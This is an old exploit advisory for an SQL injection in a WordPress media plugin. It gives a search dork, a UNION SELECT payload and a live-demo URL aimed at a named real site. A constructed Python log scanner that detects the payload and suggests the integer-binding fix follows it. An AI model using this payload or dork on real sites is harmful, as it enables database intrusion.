-------------------------------------------------------------------
WordPress Media Holder (id) SQL injection vulnerability!
-------------------------------------------------------------------
Author: boom3rang
Greetz: H!tM@N - KHG - chs - redc00de!
Site  : www.khg-crew.ws - [Kosova Hackers Group!]
-------------------------------------------------------------------
Dork: mediaHolder.php?id
-------------------------------------------------------------------
Exp: http://localHost/mediaHolder.php?id=[exploit]
-------------------------------------------------------------------
exploit:
-9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--
-------------------------------------------------------------------
liveDemo:
http://www.dhadm.com/mediaHolder.php?id=-9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--
-------------------------------------------------------------------
Proud 2 be Albanian
Proud 2 be Muslim
United States of Albania
-------------------------------------------------------------------

# milw0rm.com [2008-10-26]
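
A log-review check for the request pattern in this advisory, added here as an example and not part of the original advisory: it flags requests to mediaHolder.php whose id parameter is anything other than a plain integer. The function name, the combined-log-format assumption and the sample lines (documentation IP addresses) are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
# The second line carries the payload string quoted in the advisory.
SAMPLE_LOG = """\
198.51.100.7 - - [26/Oct/2008:10:00:01 +0000] "GET /mediaHolder.php?id=42 HTTP/1.1" 200 5120
198.51.100.9 - - [26/Oct/2008:10:00:05 +0000] "GET /mediaHolder.php?id=-9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()-- HTTP/1.1" 200 731
198.51.100.9 - - [26/Oct/2008:10:00:09 +0000] "GET /mediaHolder.php?id=7%20union%20select%201 HTTP/1.1" 200 698
203.0.113.4 - - [26/Oct/2008:10:00:30 +0000] "GET /mediaHolder.php?id=12abc HTTP/1.1" 200 412
203.0.113.4 - - [26/Oct/2008:10:01:00 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900
"""

# Client address and request target from one combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# SQL syntax that has no place in a numeric id (keywords, comments, concat()).
SQL_MARKERS = re.compile(r"union|select|/\*|--|concat\s*\(", re.IGNORECASE)
PLAIN_INT = re.compile(r"[0-9]+")


def suspicious_requests(log_text, script="mediaHolder.php"):
    """Return (client, decoded_id, reason) for every request to `script`
    whose id parameter is not a plain non-negative integer."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue
        # parse_qs percent-decodes values, so encoded payloads are normalised
        # before they are compared against the markers.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if PLAIN_INT.fullmatch(value):
                continue
            reason = "sql-syntax" if SQL_MARKERS.search(value) else "non-integer"
            findings.append((client, value, reason))
    return findings


if __name__ == "__main__":
    for client, value, reason in suspicious_requests(SAMPLE_LOG):
        print(f"{client}\t{reason}\t{value}")
```

The same integer-only rule is the fix on the server side: cast or validate id as an integer and bind it as a query parameter before it reaches the database.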